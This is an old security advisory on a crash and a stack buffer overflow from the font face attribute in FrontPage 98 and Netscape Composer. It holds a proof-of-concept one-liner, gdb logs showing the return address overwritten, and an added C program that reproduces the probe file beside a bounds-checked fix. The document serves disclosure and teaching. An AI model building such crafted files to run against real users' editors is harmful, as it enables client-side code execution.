From: S[h]iff - [ISR] - Infobyte Security Research (sh1ffciudad.com.ar)
Date: Thu Jun 13 2002 - 06:31:03 CDT


    ::: [ISR] :::
    ::: Infobyte Security Research :::
     :: www.infobyte.com.ar ::
             ::::::::::::::::::::::::::::::

    .::Software Affected:

     - Microsoft FrontPage 98
     - Netscape Composer 4.77 (U.S. build); earlier or later versions not tested

    .::Type of Problem:

     - Design Error
     - Buffer Overflow

    .::Problem:

    * Design Error:
    ----------

    When an HTML file is created that contains,
    for example:

    ------------------------------
    <html>
    <body>

    <font face="">Hola!</font>

    </body>
    </html>
    ------------------------------

    FrontPage and Composer both crash because they
    mishandle <font face=""> (an empty face argument).

    * Buffer Overflow :
    -----------------

    Composer copies the value of the face attribute into
    an unchecked buffer: a face argument of >= 191 bytes
    overwrites part of memory past the buffer,

    for example:

    ------------------------------
    <html>
    <body>

    <font face="AAAAAAAAAAAA..[191]">Hola!</font>

    </body>
    </html>
    ------------------------------
    (A >= 191)

    --------
    [ gdb logs ]
    --------

    (gdb) set args '-composer'
    (gdb) run
    Starting program: /usr/bin/netscape '-composer'

    Program received signal SIGSEGV, Segmentation fault.
    0x846e6bb in CEditElement::SetTagData () at eval.c:88
    (gdb) info all-registers
    eax 0x0 0
    ecx 0xffffffff -1
    edx 0x90a3be0 151665632
    ebx 0x90a3be0 151665632
    esp 0xbfffe0d4 0xbfffe0d4
    ebp 0xbfffe0e4 0xbfffe0e4
    esi 0x12147820 303331360
    edi 0x12147820 303331360
    eip 0x846e6bb 0x846e6bb
    eflags 0x10246 66118

    *The program starts to overwrite the saved return address
    when A = 197 bytes; check this:

    # printf "<html>\n<body>\n\n<font face=\"`perl -e 'printf "A"x197'``perl -e 'printf "\x78\x56\x34\x12"'`\">Hola!</font>\n\n</body>\n</html>\n" >> source.htm

    source.htm created contains ;

    ---------------------------
    <html>
    <body>

    <font face="AAAAAAAAAAAA..[197][ret address 0x12345678]">Hola!</font>

    </body>
    </html>
    ---------------------------

     -------
    [ gdb logs ]
     -------

    # gdb netscape

    (gdb) set args '-composer'
    (gdb) run
    Starting program: /usr/bin/netscape '-composer'

     * Here Composer loads the HTML file with the AAA... face argument.

    Program received signal SIGSEGV, Segmentation fault.
    [[0x12345678]] in ?? () at eval.c:88

    (gdb) info all-registers
    eax 0x9003e22 151010850
    ecx 0x0 0
    edx 0x25c00900 633342208
    ebx 0x90a39a0 151665056
    esp 0xbfffe0c0 0xbfffe0c0
    [ebp 0x41414141 0x41414141]
    esi 0x90d6000 151871488
    edi 0xbfffe0ec -1073749780
    [eip 0x12345678 0x12345678]
    eflags 0x10246 66118

    I checked this overflow on Slackware 8.0, where netscape is not installed setuid
    root by default.
    I did not check other distributions.
    Sorry for my poor English.

    Regards, ``S[h]iff``
    [ISR] - Crew! Mal0r..
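Added example in C, not code from the advisory or from Netscape or FrontPage. It models the two problems the advisory reports in one small program: a toy extractor for the value of a `face="..."` attribute that treats the empty value `face=""` as a legitimate (zero-length) result rather than something to crash on, the unchecked copy of that value into a fixed stack buffer beside its bounds-checked form, and a generator that builds the same probe document as the printf/perl one-liner above (N filler bytes followed by a 4-byte little-endian return address). The buffer size FACE_BUF_SIZE = 191 and every function name here are assumptions chosen to match the thresholds the advisory reports; the real Composer stack layout is not known beyond what the register dumps show. The unchecked copy is only ever called on benign input in this program.

```c
/* Added example, not from the advisory or from Netscape/FrontPage.
 * Models the bug class described: an HTML editor copies the value of
 * <font face="..."> into a fixed-size buffer with no length check.
 * FACE_BUF_SIZE and all function names are assumptions for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define FACE_BUF_SIZE 191   /* assumed: the advisory reports corruption at >= 191 bytes */

/* Locate the value of a face="..." attribute in an HTML fragment.
 * Returns a pointer to the first byte of the value and stores its length,
 * or NULL when there is no (terminated) face attribute. A zero-length value
 * (face="") is a legitimate result, not an error: that is the case the
 * original editors mishandled. */
static const char *find_face_value(const char *html, size_t *len)
{
    const char *p = strstr(html, "face=\"");
    if (!p) return NULL;
    p += strlen("face=\"");
    const char *end = strchr(p, '"');
    if (!end) return NULL;                 /* unterminated attribute */
    *len = (size_t)(end - p);
    return p;
}

/* Vulnerable pattern (never call with attacker-controlled input): the value is
 * copied with an unchecked length into a stack buffer, so a value of 191 bytes
 * or more runs past the buffer into the saved frame pointer and return address. */
static void set_face_unchecked(const char *html)
{
    char face[FACE_BUF_SIZE];
    size_t len;
    const char *v = find_face_value(html, &len);
    if (!v) return;
    memcpy(face, v, len);                  /* no bound on len */
    face[len] = '\0';
    printf("face (unchecked): \"%s\"\n", face);
}

/* Hardened form: reject values that do not fit, keeping room for the NUL.
 * Returns the value length, -1 if no face attribute, -2 if it is too long. */
static int set_face_checked(const char *html, char *out, size_t out_size)
{
    size_t len;
    const char *v = find_face_value(html, &len);
    if (!v) return -1;
    if (len >= out_size) return -2;        /* would overflow: refuse it */
    memcpy(out, v, len);
    out[len] = '\0';
    return (int)len;
}

/* Build the probe document from the advisory: `pad` filler bytes followed by
 * a 4-byte little-endian address, exactly what the printf/perl one-liner made.
 * Caller frees the result. Address bytes 0x00 and 0x22 ('"') would terminate
 * the attribute early; 0x12345678 contains neither. */
static char *build_probe_html(size_t pad, uint32_t ret_addr)
{
    const char *head = "<html>\n<body>\n\n<font face=\"";
    const char *tail = "\">Hola!</font>\n\n</body>\n</html>\n";
    size_t n = strlen(head) + pad + 4 + strlen(tail);
    char *doc = malloc(n + 1);
    if (!doc) return NULL;
    char *p = doc;
    memcpy(p, head, strlen(head)); p += strlen(head);
    memset(p, 'A', pad);           p += pad;
    for (int i = 0; i < 4; i++)            /* little-endian, as on x86 */
        *p++ = (char)((ret_addr >> (8 * i)) & 0xff);
    memcpy(p, tail, strlen(tail) + 1);     /* includes the NUL */
    return doc;
}

int main(void)
{
    char face[FACE_BUF_SIZE];
    const char *ok    = "<html><body><font face=\"Arial\">Hola!</font></body></html>";
    const char *empty = "<html><body><font face=\"\">Hola!</font></body></html>";

    set_face_unchecked(ok);                /* benign input only */
    printf("checked(Arial) -> %d\n", set_face_checked(ok, face, sizeof face));
    printf("checked(empty) -> %d \"%s\"\n", set_face_checked(empty, face, sizeof face), face);

    char *probe = build_probe_html(197, 0x12345678u);
    if (!probe) return 1;
    printf("checked(probe) -> %d\n", set_face_checked(probe, face, sizeof face));
    FILE *f = fopen("source.htm", "wb");   /* same file name the advisory used */
    if (f) { fputs(probe, f); fclose(f); }
    free(probe);
    return 0;
}
```

Compile with `cc -std=c99 -Wall -o probe probe.c`; running it writes `source.htm` with 197 filler bytes followed by the bytes 78 56 34 12, which is the document whose load produced EIP = 0x12345678 and EBP = 0x41414141 in the second gdb log. Because netscape is not setuid, the practical impact is client-side: a crafted page or attachment that a user opens in Composer, running with that user's privileges.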